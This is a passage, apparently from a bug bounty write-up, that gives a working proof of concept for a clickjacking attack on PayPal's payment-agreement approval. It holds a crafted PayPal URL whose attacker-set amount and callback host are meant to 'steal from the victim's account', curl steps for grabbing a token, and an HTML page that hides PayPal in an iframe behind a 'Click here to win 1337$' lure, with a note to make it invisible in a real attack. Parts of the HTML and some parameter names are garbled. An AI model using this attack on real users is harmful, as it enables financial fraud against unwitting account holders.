of course, the victim should be logged in in te the browser
Proof 0f C0ncept
"https://www.paypal.com/cgi-bin/webscr?address1=sectesting&address2=sectesting02&address_override=true&amount_1=1&business=<[email protected]>&cancel_return=https://xxxxxx.burpcollaborator.net/cancel_return&city=barika&cmd=_cart&country=DZ¤cy_code=USD&email=<anything>@gmail.com&first_name=attacker&invoice=marketplace133703&item_name_1=attacker&item_number_1=133788802&last_name=attacker¬ify_url=https://xxxxxx.burpcollaborator.net/notify_url&quantity_1=1&return=https://xxxxxx.burpcollaborator.net/return&state=05&upload=1&zip=1337"
- In the link above change the
business
to attacker Paypal email, andreturn
¬ify_url
to your host to receive the HTTP requests. andamount_1
how much money you want to steal from the victim's account !!.
and You can change the first/last name, and the address to your own info, and when you do this, this Billing full name/address will register in the victim account !.
2 . now send GET request using CURL, and grep the token value.
3. upload this poc.html On your host and put your token In the parameter ba_token.
<!DOCTYPE html>
<html>
<head>
<title>POC</title>
</head>
<body>
<center> <img src="<a "au lg" href="https://i.ibb.co/bWqXsQT/Mnanauk-2020-Chef-Mnanauk.jpg" rel="noopener ugc nofollow" target="_blank" style="box-sizing: inherit; color: inherit; text-decoration-line: underline; -webkit-tap-highlight-color: transparent;">https://i.ibb.co/bWqXsQT/Mnanauk-2020-Chef-Mnanauk.jpg"></center>
<style>
iframe {
width: 1920px;
height: 1080px;
position: absolute;
top:0; left:-20px;
opacity: 1.01;
z-index: 1;
}
</style>
<iframe src="<a "au lg" href="https://www.paypal.com/agreements/approve?nolegacy=1&ba_token=" rel="noopener ugc nofollow" target="_blank" style="box-sizing: inherit; color: inherit; text-decoration-line: underline; -webkit-tap-highlight-color: transparent;">https://www.paypal.com/agreements/approve?nolegacy=1&ba_token=<TOKEN>"></iframe>
<button style="position: fixed; display: inline; z-index: 10; left: 701px; top: 520px;">Click here to win 1337$ => </button></body>
</html>
Note : the opacity
should be 0 in a real attack, you can change it.
Now Login to your PayPal in the browser, and open the HTML page.
*Beware click the link!